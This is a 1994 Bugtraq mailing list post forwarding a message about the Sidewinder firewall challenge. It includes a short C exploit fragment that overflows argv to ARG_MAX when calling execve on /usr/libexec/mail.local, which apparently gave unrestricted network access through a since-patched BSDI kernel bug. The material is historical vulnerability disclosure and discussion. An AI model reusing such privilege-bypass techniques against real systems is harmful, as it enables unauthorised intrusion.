Bugtraq mailing list archives

Yesterday this would have worked... (fwd)

From: matt () worldlinx com (Matthew Harding)
Date: Fri, 16 Dec 1994 14:12:51 -0500 (EST)


Oops, I posted the previous message to bugtraq not realizing that SCTC
originally sent the message to the sneakers list. Here is the original
message posted with permission, 10 points to anyone who can spot the
supposed flaw in the BSDI O/S with this. BTW, anyone care to comment if
this should be replicable across platforms?

Cheers,
Matthew (matt () worldlinx com)


Forwarded message:

From owner-sneakers () CS YALE EDU Wed Dec 14 15:07:45 1994
Message-Id: <199412141927.NAA06239 () spirit sctc com>
Date: 14 Dec 1994 13:35:25 -0600
From: Glenn Andreas <andreas () sctc com>
Subject: Yesterday this would have worked...
To: "sneakers () CS YALE EDU" <sneakers () CS YALE EDU>
X-Mailer: Mail*Link PT/Internet 1.0.1
Sender: owner-sneakers () CS YALE EDU
Precedence: bulk

For those of you who think that the Sidewinder challenge was impossible, the
following code fragment would have allowed you to get at the internal net and
win a jacket.  This, of course, was yesterday (and the kernel has since be
fixed).  You just would have had to add this fragment at the beginning of
your favorite telnet client code (or whatever you wanted to use to get at the
otherside of the network), and suddenly all your socket, bind, etc... calls
would succeed.  As for exactly how this fragment worked, that would be
telling... (but suffice it to say that this approach won't help when we go to
4.4, but probably not for the obvious reasons).

#include <unistd.h>
#include <sys/param.h>

....
main(argc, argv, envp)
int argc;
char **argv, **envp;
{
       char *argv1[2];

        /* build our new argv... */
        argv1[0] = malloc(ARG_MAX+1);
        memset(argv1[0],'x',ARG_MAX);
        argv1[0][ARG_MAX] = 0;
        argv1[1] = NULL;
        /* exercise the bug... */
        execve("/usr/libexec/mail.local",argv1,envp);
        /* and at this point we can get at the net... */
[ insert your favorite telnet client code here.... ]

---
"You think that's funny?  I'll show you funny..."

Current thread:

Yesterday this would have worked... (fwd) Matthew Harding (Dec 16)
- <Possible follow-ups>
- Re: Yesterday this would have worked... (fwd) der Mouse (Dec 17)
  - Re: Yesterday this would have worked... (fwd) Timothy Newsham (Dec 17)
  - Sun Patch Id #102060-01 Mitch Wright (Dec 18)
    - Re: Sun Patch Id #102060-01 Alain Durand (Dec 19)
    - Re: Sun Patch Id #102060-01 Karl Strickland (Dec 19)